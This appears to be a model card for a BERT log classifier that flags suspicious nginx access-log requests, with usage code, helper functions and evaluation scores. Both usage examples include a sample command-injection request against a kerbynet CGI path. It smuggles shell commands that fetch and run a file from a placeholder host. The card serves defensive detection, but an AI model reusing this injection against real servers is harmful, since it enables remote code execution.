Log Inspector

A text-classification model trained on nginx access logs to tell suspicious requests from safe ones. Based on bert-base-cased.

How to use

Here is how to use this model to inspect a log.

The input text must be formatted like this:
"path: <path>; ref:<referrer>; ua:<user agent>;"

>>> from transformers import pipeline
>>> inspector = pipeline('text-classification', model="u-haru/log-inspector")
>>> inspector('path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;')
[{'label': 'LABEL_0', 'score': 0.9999788999557495}]

Class 0 (LABEL_0) is a suspicious log. Class 1 (LABEL_1) is a safe log.
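
The input format described above can be built from a raw access log line. The sketch below is one possible way to do it, assuming the logs use nginx's default "combined" format. The regex and the helper names `format_log` and `line_to_input` are illustrative and are not taken from the model's source code, so the author's own preprocessing may differ.

```python
import re

# Assumption: logs follow nginx's default "combined" format:
# addr - user [time] "request" status bytes "referrer" "user agent"
COMBINED = re.compile(
    r'\S+ \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

def format_log(path, referrer="-", user_agent="-"):
    """Build the 'path: ...; ref:...; ua:...;' string the model expects."""
    return f"path: {path}; ref:{referrer}; ua:{user_agent};"

def line_to_input(line):
    """Convert one combined-format log line to model input, or None if it does not match."""
    m = COMBINED.match(line)
    if m is None:
        return None
    parts = m.group("request").split(" ")
    # A well-formed request is "METHOD PATH PROTOCOL"; otherwise keep the raw request.
    path = parts[1] if len(parts) >= 2 else m.group("request")
    return format_log(path, m.group("ref"), m.group("ua"))

# Hypothetical example line (documentation IP address, made-up request).
sample = '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "curl/8.0.1"'
print(line_to_input(sample))
```

The returned string can be passed directly to `inspector(...)`. Lines that do not match the assumed format return `None` and should be skipped or handled separately.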

With simpletransformers:

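>>> import torch
>>> from simpletransformers.classification import ClassificationModel
>>> use_cuda = True  # set to False to force CPU inference
>>> param = {}  # simpletransformers model args; an empty dict keeps the defaults
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)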
>>> predictions, raw_outputs = model.predict(['path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;'])
>>> print(predictions)
[0]
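
The two interfaces report the class differently: the pipeline returns a string such as `LABEL_0`, while simpletransformers returns an integer such as `0`. A small helper can map both to readable names. This is a minimal sketch based only on the class description in this card. The names `CLASS_NAMES` and `class_name` are hypothetical.

```python
# Class meanings as stated in this model card.
CLASS_NAMES = {0: "suspicious", 1: "safe"}

def class_name(label):
    """Accept an integer class id or a 'LABEL_<id>' string and return a readable name."""
    if isinstance(label, str):
        # "LABEL_0" -> 0
        label = int(label.rsplit("_", 1)[-1])
    return CLASS_NAMES[label]

print(class_name(0))          # integer id, as in simpletransformers predictions
print(class_name("LABEL_1"))  # string label, as in pipeline output
```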

Training and evaluation:

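>>> import pandas as pd
>>> import torch
>>> from simpletransformers.classification import ClassificationModel
>>> use_cuda = True  # set to False to force CPU
>>> param = {}  # simpletransformers model args; an empty dict keeps the defaults
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> data = [["Suspicious log", 0], ["Safe log", 1]]  # placeholder rows: [text, label]
>>> df = pd.DataFrame(data, columns=["text", "labels"])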

>>> model.train_model(df)
>>> result, model_outputs, wrong_predictions = model.eval_model(df)
>>> print(result)
{'mcc': 1.0, 'tp': 1, 'tn': 1, 'fp': 0, 'fn': 0, 'auroc': 1.0, 'auprc': 1.0, 'eval_loss': 1.8238850316265598e-05}

I trained the model on 9,500 access logs. Here are the evaluation scores:

{'mcc': 0.993114718313972, 'tp': 1639, 'tn': 729, 'fp': 0, 'fn': 7, 'auroc': 0.9994166345815686, 'auprc': 0.9997937194890235, 'eval_loss': 0.020282083051662583}

And here are the evaluation scores on 10,000 logs:

{'mcc': 0.8494104528008076, 'tp': 9964, 'tn': 26, 'fp': 0, 'fn': 10, 'auroc': 0.9999845752803442, 'auprc': 0.9999999597891697, 'eval_loss': 0.0058870489358901976}
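
The `mcc` values can be reproduced from the confusion-matrix counts reported above, which also shows why the second score is lower even though almost every log is classified correctly. The sketch below uses the standard Matthews correlation coefficient formula. The function name `mcc` and the dictionary names are illustrative.

```python
import math

def mcc(tp, tn, fp, fn):
    """Matthews correlation coefficient from confusion-matrix counts."""
    denom = math.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
    return (tp * tn - fp * fn) / denom if denom else 0.0

# Counts copied from the two evaluation results in this card.
first = dict(tp=1639, tn=729, fp=0, fn=7)
second = dict(tp=9964, tn=26, fp=0, fn=10)

for name, counts in (("first", first), ("second", second)):
    total = sum(counts.values())
    accuracy = (counts["tp"] + counts["tn"]) / total
    print(name, "accuracy:", round(accuracy, 4), "mcc:", round(mcc(**counts), 4))
```

In the second set only 26 of the 10,000 logs belong to the negative class, so the 10 false negatives weigh heavily on MCC while barely affecting accuracy. Assuming the usual convention that label 1 (safe) is the positive class, those 10 errors would be safe logs flagged as suspicious.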

Training

The source code is available at github.com/u-haru/log-inspector
